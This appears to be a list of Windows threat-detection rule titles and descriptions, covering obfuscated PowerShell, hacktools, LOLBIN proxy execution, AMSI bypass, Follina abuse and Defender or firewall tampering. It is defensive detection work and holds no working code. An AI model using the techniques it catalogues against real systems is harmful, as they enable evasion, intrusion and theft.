Invoke-Obfuscation COMPRESS OBFUSCATIONmediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation CLIP+ LauncherhighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX InvocationhighDetects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
Invoke-Obfuscation STDIN+ LauncherhighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ LauncherhighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation Via StdinhighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use CliphighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use MSHTAhighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATIONhighDetects Obfuscated Powershell via VAR++ LAUNCHER
HackTool - LocalPotato ExecutionhighDetects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples
HackTool - PowerTool ExecutionhighDetects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files
HackTool - RedMimicry Winnti Playbook ExecutionhighDetects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
HackTool - PPID Spoofing SelectMyParent Tool ExecutionhighDetects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent
HackTool - SharpEvtMute ExecutionhighDetects the use of SharpEvtHook, a tool that tampers with the Windows event logs
HackTool - SharpImpersonation ExecutionhighDetects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
HackTool - SharpDPAPI ExecutionhighDetects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
HackTool - Stracciatella ExecutionhighDetects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
HackTool - UACMe Akagi ExecutionhighDetects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata
HackTool - WinPwn ExecutionhighDetects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
HackTool - Wmiexec Default Powershell CommandhighDetects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
HackTool - XORDump ExecutionhighDetects suspicious use of XORDump process memory dumping utility
Suspicious ZipExec ExecutionmediumZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
Potential Fake Instance Of Hxtsr.EXE ExecutedmediumHxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
Use Icacls to Hide File to EveryonemediumDetect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files
Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious LocationhighDetects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors.
Disable Windows IIS HTTP LogginghighDisables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)
Suspicious IIS URL GlobalRules Rewrite Via AppCmdmediumDetects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.
C# IL Code Compilation Via Ilasm.EXEmediumDetects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL.
ImagingDevices Unusual Parent/Child ProcesseshighDetects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity
Arbitrary File Download Via IMEWDBLD.EXEhighDetects usage of "IMEWDBLD.exe" to download arbitrary files
InfDefaultInstall.exe .inf ExecutionmediumExecutes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
File Download Via InstallUtil.EXEmediumDetects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
Suspicious Execution of InstallUtil Without LogmediumUses the .NET InstallUtil.exe application in order to execute image without log
JScript Compiler ExecutionlowDetects the execution of the "jsc.exe" (JScript Compiler). Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.
Kavremover Dropped Binary LOLBIN UsagehighDetects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
Windows Kernel Debugger ExecutionmediumDetects execution of the Windows Kernel Debugger "kd.exe".
Potentially Suspicious Child Process of KeyScrambler.exemediumDetects potentially suspicious child processes of KeyScrambler.exe
Import LDAP Data Interchange Format File Via Ldifde.EXEmediumDetects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
Uncommon Link.EXE Parent ProcessmediumDetects an uncommon parent process of "LINK.EXE". Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation. Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity. This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location. By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.
Suspicious Windows Trace ETW Session Tamper Via Logman.EXEhighDetects the execution of "logman" utility in order to disable or delete Windows trace sessions
Suspicious CustomShellHost ExecutionmediumDetects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe'
Devtoolslauncher.exe Executes Specified BinaryhighThe Devtoolslauncher.exe executes other binary
DeviceCredentialDeployment ExecutionmediumDetects the execution of DeviceCredentialDeployment to hide a process from view
Suspicious Diantz Alternate Data Stream ExecutionmediumCompress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
Suspicious Extrac32 Alternate Data Stream ExecutionmediumExtract data from cab file and hide it in an alternate data stream
Gpscript ExecutionmediumDetects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy
Ie4uinit Lolbin Use From Invalid PathmediumDetect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories
Launch-VsDevShell.PS1 Proxy ExecutionmediumDetects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
Potential Manage-bde.wsf Abuse To Proxy ExecutionhighDetects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution
Mavinject Inject DLL Into Running ProcesshighDetects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
MpiExec LolbinhighDetects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary
Execute Files with Msdeploy.exemediumDetects file execution using the msdeploy.exe lolbin
Execute MSDT Via Answer FilehighDetects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)
OpenWith.exe Executes Specified BinaryhighThe OpenWith.exe executes other binary
Indirect Command Execution By Program Compatibility WizardlowDetect indirect command execution via Program Compatibility Assistant pcwrun.exe
Execute Pcwrun.EXE To Leverage FollinahighDetects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
Code Execution via Pcwutl.dllmediumDetects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
Execute Code with Pester.bat as ParentmediumDetects code execution via Pester.bat (Pester - Powershell Modulte for testing)
Execute Code with Pester.batmediumDetects code execution via Pester.bat (Pester - Powershell Modulte for testing)
PrintBrm ZIP Creation of ExtractionhighDetects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
Pubprn.vbs Proxy ExecutionmediumDetects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.
DLL Execution via Rasautou.exemediumDetects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.
REGISTER_APP.VBS Proxy ExecutionmediumDetects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
Use of Remote.exemediumRemote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.
Lolbin Runexehelper Use As ProxymediumDetect usage of the "runexehelper.exe" binary as a proxy to launch other programs
Suspicious Runscripthelper.exemediumDetects execution of powershell scripts via Runscripthelper.exe
Use of Scriptrunner.exemediumThe "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
Using SettingSyncHost.exe as LOLBinhighDetects using SettingSyncHost.exe to run hijacked binary
Use Of The SFTP.EXE Binary As A LOLBINmediumDetects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
SyncAppvPublishingServer Execute Arbitrary PowerShell CodemediumExecutes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
SyncAppvPublishingServer VBS Execute Arbitrary PowerShell CodemediumExecutes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
Potential DLL Injection Or Execution Using Tracker.exemediumDetects potential DLL injection and execution using "Tracker.exe"
Use of TTDInject.exemediumDetects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)
Time Travel Debugging Utility UsagehighDetects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Lolbin Unregmp2.exe Use As ProxymediumDetect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
UtilityFunctions.ps1 Proxy DllmediumDetects the use of a Microsoft signed script executing a managed DLL with PowerShell.
Use of VisualUiaVerifyNative.exemediumVisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.
Visual Basic Command Line Compiler UsagehighDetects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
Use of VSIISExeLauncher.exemediumThe "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries
Use of Wfc.exemediumThe Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.
Potential Register_App.Vbs LOLScript AbusemediumDetects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.
Potential Mftrace.EXE AbusemediumDetects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
CodePage Modification Via MODE.COM To Russian LanguagemediumDetects a CodePage modification using the "mode.com" utility to Russian language. This behavior has been used by threat actors behind Dharma ransomware.
Potential Suspicious Mofcomp ExecutionhighDetects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts
Potential Mpclient.DLL Sideloading Via Defender BinarieshighDetects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
File Download Via Windows Defender MpCmpRun.EXEhighDetects the use of Windows Defender MpCmdRun.EXE to download files
Suspicious Msbuild Execution By Uncommon Parent ProcessmediumDetects suspicious execution of 'Msbuild.exe' by a uncommon parent process
Windows Defender Definition Files RemovedhighAdversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files
Potential Arbitrary Command Execution Using Msdt.EXEhighDetects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability
Suspicious Cabinet File Execution Via Msdt.EXEmediumDetects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190
Arbitrary File Download Via MSEDGE_PROXY.EXEmediumDetects usage of "msedge_proxy.exe" to download arbitrary files
Suspicious MSDT Parent ProcesshighDetects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
Remotely Hosted HTA File Executed Via Mshta.EXEhighDetects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
Suspicious JavaScript Execution Via Mshta.EXEhighDetects execution of javascript code using "mshta.exe".
Potential LethalHTA Technique ExecutionhighDetects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process
Suspicious MSHTA Child ProcesshighDetects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
MSHTA Suspicious Execution 01highDetection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
DllUnregisterServer Function Call Via Msiexec.EXEmediumDetects MsiExec loading a DLL and calling its DllUnregisterServer function
Suspicious MsiExec Embedding ParentmediumAdversaries may abuse msiexec.exe to proxy the execution of malicious payloads
Suspicious Msiexec Execute Arbitrary DLLmediumAdversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
Msiexec Quiet InstallationmediumAdversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
Suspicious Msiexec Quiet Install From Remote LocationmediumDetects usage of Msiexec.exe to install packages hosted remotely quietly
Potential MsiExec MasqueradinghighDetects the execution of msiexec.exe from an uncommon directory
MsiExec Web InstallmediumDetects suspicious msiexec process starts with web addresses as parameter
Arbitrary File Download Via MSOHTMED.EXEmediumDetects usage of "MSOHTMED" to download arbitrary files
Arbitrary File Download Via MSPUB.EXEmediumDetects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
Potential Process Injection Via Msra.EXEhighDetects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics
Detection of PowerShell Execution via Sqlps.exemediumThis rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
SQL Client Tools PowerShell Session DetectionmediumThis rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
Msxsl.EXE ExecutionmediumDetects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
Remote XSL Execution Via Msxsl.EXEhighDetects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.
New Firewall Rule Added Via Netsh.EXEmediumDetects the addition of a new rule to the Windows firewall via netsh
Suspicious Program Location Whitelisted In Firewall Via Netsh.EXEhighDetects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall
RDP Connection Allowed Via Netsh.EXEhighDetects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
Firewall Rule Deleted Via Netsh.EXEmediumDetects the removal of a port or application rule in the Windows Firewall configuration using netsh
Firewall Disabled via Netsh.EXEmediumDetects netsh commands that turns off the Windows firewall
Netsh Allow Group Policy on Microsoft Defender FirewallmediumAdversaries may modify system firewalls in order to bypass controls limiting network usage
Firewall Rule Update Via Netsh.EXEmediumDetects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule
New Port Forwarding Rule Added Via Netsh.EXEmediumDetects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
RDP Port Forwarding Rule Added Via Netsh.EXEhighDetects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
Unmount Share Via Net.EXElowDetects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
Password Provided In Command Line Of Net.EXEmediumDetects a when net.exe is called with a password in the command line
Potential Arbitrary Code Execution Via Node.EXEhighDetects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc
Node Process ExecutionsmediumDetects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
Nslookup PowerShell Download Cradle - ProcessCreationmediumDetects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records
Driver/DLL Installation Via Odbcconf.EXEmediumDetects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.
Suspicious Driver/DLL Installation Via Odbcconf.EXEhighDetects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method.
New DLL Registered Via Odbcconf.EXEmediumDetects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.
Odbcconf.EXE Suspicious DLL LocationhighDetects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
Potentially Suspicious DLL Registered Via Odbcconf.EXEhighDetects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses.
Response File Execution Via Odbcconf.EXEmediumDetects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
Suspicious Response File Execution Via Odbcconf.EXEhighDetects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.
Uncommon Child Process Spawned By Odbcconf.EXEmediumDetects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
Potential Arbitrary File Download Using Office ApplicationhighDetects potential arbitrary file download using a Microsoft Office application
Potentially Suspicious Office Document Executed From Trusted LocationhighDetects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.
OneNote.EXE Execution of Malicious Embedded ScriptshighDetects the execution of malicious OneNote documents that contain embedded scripts. When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
Potential Arbitrary DLL Load Using WinwordmediumDetects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.
Suspicious Microsoft Office Child ProcesshighDetects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE ExecutionmediumDetects execution of Windows Defender "OfflineScannerShell.exe" from its non standard directory. The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will load any DLL named "mpclient.dll" from the current working directory.
Ping Hex IPhighDetects a ping command that uses a hex encoded IP address
Suspicious Powercfg Execution To Change Lock Screen TimeoutmediumDetects suspicious execution of 'Powercfg.exe' to change lock screen timeout
Potential AMSI Bypass Via .NET ReflectionhighDetects Request to "amsiInitFailed" that can be used to disable AMSI Scanning
Potential AMSI Bypass Using NULL BitsmediumDetects usage of special strings/null bits in order to potentially bypass AMSI functionalities
Suspicious Obfuscated PowerShell CodehighDetects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines
PowerShell Base64 Encoded FromBase64String CmdlethighDetects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
PowerShell Base64 Encoded Invoke KeywordhighDetects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
Powershell Base64 Encoded MpPreference CmdlethighDetects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
PowerShell Base64 Encoded Reflective Assembly LoadhighDetects base64 encoded .NET reflective loading of Assembly
Suspicious Encoded And Obfuscated Reflection Assembly Load Function CallhighDetects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
Potential Process Execution Proxy Via CL_Invocation.ps1mediumDetects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"
PowerShell Base64 Encoded WMI ClasseshighDetects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
Assembly Loading Via CL_LoadAssembly.ps1mediumDetects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls.
Potential Script Proxy Execution Via CL_Mutexverifiers.ps1mediumDetects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
Potential PowerShell Obfuscation Via Reversed CommandshighDetects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
ConvertTo-SecureString Cmdlet Usage Via CommandLinemediumDetects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
Potential PowerShell Command Line ObfuscationhighDetects the PowerShell command lines with special characters
Powershell Defender Disable Scan FeaturehighDetects requests to disable Microsoft Defender features using PowerShell commands
Powershell Defender ExclusionmediumDetects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
Disable Windows Defender AV Security MonitoringhighDetects attackers attempting to disable Windows Defender using Powershell
Windows Firewall Disabled via PowerShellmediumDetects attempts to disable the Windows Firewall using PowerShell
Potential PowerShell Downgrade AttackmediumDetects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
Disabled IE Security FeatureshighDetects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
Obfuscated PowerShell OneLiner ExecutionhighDetects the execution of a specific OneLiner to download and execute powershell modules in memory.
Potential Suspicious Windows Feature Enabled - ProcCreationmediumDetects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
Potential Encoded PowerShell Patterns In CommandLinelowDetects specific combinations of encoding methods in PowerShell via the commandline
Base64 Encoded PowerShell Command DetectedhighDetects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
Abuse of Service Permissions to Hide Services Via Set-ServicehighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
Root Certificate Installed From Susp LocationshighAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
Unsigned AppX Installation Attempt Using Add-AppxPackagemediumDetects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
Suspicious PowerShell Invocations - Specific - ProcessCreationmediumDetects suspicious PowerShell invocation command parameters
Potential PowerShell Obfuscation Via WCHARhighDetects suspicious encoded character syntax often used for defense evasion
Tamper Windows Defender Remove-MpPreferencehighDetects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet
RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesseshighDetects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
Run PowerShell Script from ADShighDetects PowerShell script execution from Alternate Data Stream (ADS)
Run PowerShell Script from Redirected Input StreamhighDetects PowerShell script execution via input stream redirect
PowerShell Set-Acl On Windows FolderhighDetects PowerShell scripts to set the ACL to a file in the Windows folder
PowerShell Script Change Permission Via Set-AclhighDetects PowerShell execution to set the ACL of a file or a folder
Service StartupType Change Via PowerShell Set-ServicemediumDetects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
Powershell Token Obfuscation - Process CreationhighDetects TOKEN OBFUSCATION technique from Invoke-Obfuscation
Suspicious X509Enrollment - Process CreationmediumDetect use of X509Enrollment
Suspicious XOR Encoded PowerShell CommandmediumDetects presence of a potentially xor encoded powershell command
Arbitrary File Download Via PresentationHost.EXEmediumDetects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files
XBAP Execution From Uncommon Locations Via PresentationHost.EXEmediumDetects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
Visual Studio NodejsTools PressAnyKey Arbitrary Binary ExecutionmediumDetects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
Abusing Print ExecutablemediumAttackers can use print.exe for remote file copy
File Download Using ProtocolHandler.exemediumDetects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Suspicious Provlaunch.EXE Child ProcesshighDetects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
Potential Provlaunch.EXE Binary Proxy Execution AbusemediumDetects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
PUA - AdvancedRun ExecutionmediumDetects the execution of AdvancedRun utility
PUA - AdvancedRun Suspicious ExecutionhighDetects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
PUA - CleanWipe ExecutionhighDetects the use of CleanWipe a tool usually used to delete Symantec antivirus.
PUA - DefenderCheck ExecutionhighDetects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.
PUA - Process Hacker ExecutionmediumDetects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.
PUA - Potential PE Metadata Tamper Using RceditmediumDetects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
PUA - System Informer ExecutionmediumDetects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
Suspicious RASdial ActivitymediumDetects suspicious process related to rasdial.exe
Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon ExtensionmediumDetects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.
Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon LocationmediumDetects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location
Imports Registry Key From a FilemediumDetects the import of the specified file to the registry with regedit.exe.
Imports Registry Key From an ADShighDetects the import of a alternate datastream to the registry with regedit.exe.
Suspicious Registry Modification From ADS Via Regini.EXEhighDetects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.
Registry Modification Via Regini.EXElowDetects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.
DLL Execution Via Register-cimprovider.exemediumDetects using register-cimprovider.exe to execute arbitrary dll file.
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLIhighDetects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
Python Function Execution Security Warning Disabled In ExcelhighDetects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
Potential Provisioning Registry Key Abuse For Binary Proxy ExecutionhighDetects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
Potential PowerShell Execution Policy Tampering - ProcCreationhighDetects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine
Potential Regsvr32 Commandline Flag AnomalymediumDetects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
Potentially Suspicious Regsvr32 HTTP IP PatternhighDetects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
Potentially Suspicious Regsvr32 HTTP/FTP PatternmediumDetects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
Suspicious Regsvr32 Execution From Remote SharehighDetects REGSVR32.exe to execute DLL hosted on remote shares
Potentially Suspicious Child Process Of Regsvr32highDetects potentially suspicious child processes of "regsvr32.exe".
Regsvr32 Execution From Potential Suspicious LocationmediumDetects execution of regsvr32 where the DLL is located in a potentially suspicious location.
Regsvr32 Execution From Highly Suspicious LocationhighDetects execution of regsvr32 where the DLL is located in a highly suspicious locations
Regsvr32 DLL Execution With Suspicious File ExtensionhighDetects the execution of REGSVR32.exe with DLL files masquerading as other files
Scripting/CommandLine Process Spawned Regsvr32mediumDetects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
Regsvr32 DLL Execution With Uncommon ExtensionmediumDetects a "regsvr32" execution where the DLL doesn't contain a common file extension.
Add SafeBoot Keys Via Reg UtilityhighDetects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not
SafeBoot Registry Key Deleted Via Reg.EXEhighDetects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products
Suspicious Windows Defender Folder Exclusion Added Via Reg.EXEmediumDetects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.
Service Registry Key Deleted Via Reg.EXEhighDetects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services
Potentially Suspicious Desktop Background Change Using Reg.EXEmediumDetects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
Security Service Disabled Via Reg.EXEhighDetects execution of "reg.exe" to disable security services such as Windows Defender.
Potential Suspicious Registry File Imported Via Reg.EXEmediumDetects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
LSA PPL Protection Disabled Via Reg.EXEhighDetects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
Modify Group Policy SettingsmediumDetect malicious GPO modifications can be used to implement many other malicious behaviors.
